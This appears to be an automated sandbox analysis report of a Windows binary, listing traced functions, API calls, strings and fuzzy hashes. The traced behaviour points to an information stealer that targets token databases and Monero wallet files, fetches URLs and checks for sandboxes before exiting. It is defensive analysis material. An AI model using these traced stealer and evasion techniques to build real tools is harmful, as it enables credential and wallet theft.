Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 00165b238907f91f21834d5232bb24e4f44447593fe1c2b52b215e07590af594
Instruction ID: 52cda375ef054e8d21d3be0b2ec5e535f278973f3d4714c07c37b9ef8c0c9fa5
Opcode Fuzzy Hash: 00165b238907f91f21834d5232bb24e4f44447593fe1c2b52b215e07590af594
Instruction Fuzzy Hash: 2B611CB59141689BDF24EB54CC45BDAB7B8FF44300F0481E9E689E6141DB705BC9CF91

Function 0089BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

lstrlen.KERNEL32(00000000), ref: 0089BC9F

Part of subcall function 008A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0089BCCD
lstrlen.KERNEL32(00000000), ref: 0089BDA5
lstrlen.KERNEL32(00000000), ref: 0089BDB9

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0089BBEB
AccountTokens, xrefs: 0089BB49
AccountTokens, xrefs: 0089BABA
AccountId, xrefs: 0089BCC4

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: c977948d41331916f227051f0a3bb6406ac5d67d2e8c4dda0e9905fdf6810f2d
Instruction ID: d778f6c940332448280b1dec80b70b933fd537648cffb630e08c9dae742750c2
Opcode Fuzzy Hash: c977948d41331916f227051f0a3bb6406ac5d67d2e8c4dda0e9905fdf6810f2d
Instruction Fuzzy Hash: D7B13A719101089AEF48EBA8DD96AEE7378FF15300F444129F507E6991EF386A49CB63

Function 00894FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00894FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00894FD1
InternetOpenA.WININET(008B0DDF,00000000,00000000,00000000,00000000), ref: 00894FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00895011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00895041
InternetCloseHandle.WININET(?), ref: 008950B9
InternetCloseHandle.WININET(?), ref: 008950C6

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 799fc8dbc090888bb38b679238f5b808601180aaae10787f3cb0828fba2052b7
Instruction ID: a35fb31be95a8b474019a7d9b13b29ce2358d3992cb20077895183526d63f9b5
Opcode Fuzzy Hash: 799fc8dbc090888bb38b679238f5b808601180aaae10787f3cb0828fba2052b7
Instruction Fuzzy Hash: D031F8B4A0021CABDB20DF94DC85BDDB7B4FB48704F1081D9FA09A7281D7746AC68F99

Function 008A8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0156DE00,00000000,?,008B0E2C,00000000,?,00000000), ref: 008A8130
RtlAllocateHeap.NTDLL(00000000), ref: 008A8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008A8158
wsprintfA.USER32 ref: 008A81AC

Strings

%d MB, xrefs: 008A81A3
@, xrefs: 008A814D

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: e126cf118e8e4668560cf7304922e55e924039b28987f6a35656c02aad8c2aaa
Instruction ID: cfba3f8b178286f65f50f9ec489d7156056f36a1aae02e0176af8b63ab1daf18
Opcode Fuzzy Hash: e126cf118e8e4668560cf7304922e55e924039b28987f6a35656c02aad8c2aaa
Instruction Fuzzy Hash: 6521F9B1E44218ABEB00DFD4CC49FAEB7B8FB45B14F104509F616EB680D77869018BA5

Function 008A83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008A8426
wsprintfA.USER32 ref: 008A8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 008A847B
RegCloseKey.ADVAPI32(00000000), ref: 008A848C
RegCloseKey.ADVAPI32(00000000), ref: 008A8499

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

RegQueryValueExA.KERNEL32(00000000,0156DE18,00000000,000F003F,?,00000400), ref: 008A84EC
lstrlen.KERNEL32(?), ref: 008A8501
RegQueryValueExA.KERNEL32(00000000,0156DED8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,008B0B34), ref: 008A8599
RegCloseKey.KERNEL32(00000000), ref: 008A8608
RegCloseKey.ADVAPI32(00000000), ref: 008A861A

Strings

%s\%s, xrefs: 008A844D

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 0720f8566122a2ed5aa61d12a0fd24a1bc2b5f1f1f396c2ca2c8ee4ca75302c6
Instruction ID: dde791ff18e9f35cfa43f8890753c7f3eff71bc6582ffd31cde46f228a51e489
Opcode Fuzzy Hash: 0720f8566122a2ed5aa61d12a0fd24a1bc2b5f1f1f396c2ca2c8ee4ca75302c6
Instruction Fuzzy Hash: 5E211B7190121C9BEB24DB54DC85FE9B3B8FB58700F00C5D9E60A96140DF756A86CFE4

Function 008A7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A76A4
RtlAllocateHeap.NTDLL(00000000), ref: 008A76AB
RegOpenKeyExA.KERNEL32(80000002,0155BA48,00000000,00020119,00000000), ref: 008A76DD
RegQueryValueExA.KERNEL32(00000000,0156DF38,00000000,00000000,?,000000FF), ref: 008A76FE
RegCloseKey.ADVAPI32(00000000), ref: 008A7708

Strings

Windows 11, xrefs: 008A76BD

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 6ad8a8b2cf2fcbc71c6124cfc3a73007ef14d5a7a7fc53f60827c1395f91b335
Instruction ID: a54a25e3a1dac1afceb5c5b2885630d3029fd03bcf31aab32f193a26722fbf92
Opcode Fuzzy Hash: 6ad8a8b2cf2fcbc71c6124cfc3a73007ef14d5a7a7fc53f60827c1395f91b335
Instruction Fuzzy Hash: FD014BB5A45208BFEB00DBE4DC49FAEB7B8EB58701F108056FA06D7290E67499069B52

Function 008A7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7734
RtlAllocateHeap.NTDLL(00000000), ref: 008A773B
RegOpenKeyExA.KERNEL32(80000002,0155BA48,00000000,00020119,008A76B9), ref: 008A775B
RegQueryValueExA.KERNEL32(008A76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 008A777A
RegCloseKey.ADVAPI32(008A76B9), ref: 008A7784

Strings

CurrentBuildNumber, xrefs: 008A7771

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 1fe0e6c799cf6b4f3ac87666d950c3ae585e3958faf4cd4b8799a882c1d21244
Instruction ID: 05c38f8622185dfb4223ac2bb1b40505692249ba1f452e3f00738cdc8476f1cd
Opcode Fuzzy Hash: 1fe0e6c799cf6b4f3ac87666d950c3ae585e3958faf4cd4b8799a882c1d21244
Instruction Fuzzy Hash: 5C0144B5A40308BBE700DFE4DC49FAEB7B8FB54700F004555FA06E7281D67055019B51

Function 008A69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,01560840), ref: 008A98A1
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,015605E8), ref: 008A98BA
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,015607F8), ref: 008A98D2
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,01560600), ref: 008A98EA
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,01560798), ref: 008A9903
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,015688D0), ref: 008A991B
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,015566C0), ref: 008A9933
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,01556860), ref: 008A994C
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,01560570), ref: 008A9964
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,015606F0), ref: 008A997C
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,015606A8), ref: 008A9995
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,01560678), ref: 008A99AD
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,01556940), ref: 008A99C5
Part of subcall function 008A9860: GetProcAddress.KERNEL32(75900000,01560708), ref: 008A99DE

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008911D0: ExitProcess.KERNEL32 ref: 00891211

Part of subcall function 00891160: GetSystemInfo.KERNEL32(?), ref: 0089116A
Part of subcall function 00891160: ExitProcess.KERNEL32 ref: 0089117E

Part of subcall function 00891110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0089112B
Part of subcall function 00891110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00891132
Part of subcall function 00891110: ExitProcess.KERNEL32 ref: 00891143

Part of subcall function 00891220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0089123E
Part of subcall function 00891220: ExitProcess.KERNEL32 ref: 00891294

Part of subcall function 008A6770: GetUserDefaultLangID.KERNEL32 ref: 008A6774

Part of subcall function 00891190: ExitProcess.KERNEL32 ref: 008911C6

Part of subcall function 008A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008911B7), ref: 008A7880
Part of subcall function 008A7850: RtlAllocateHeap.NTDLL(00000000), ref: 008A7887
Part of subcall function 008A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008A789F

Part of subcall function 008A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7910
Part of subcall function 008A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008A7917
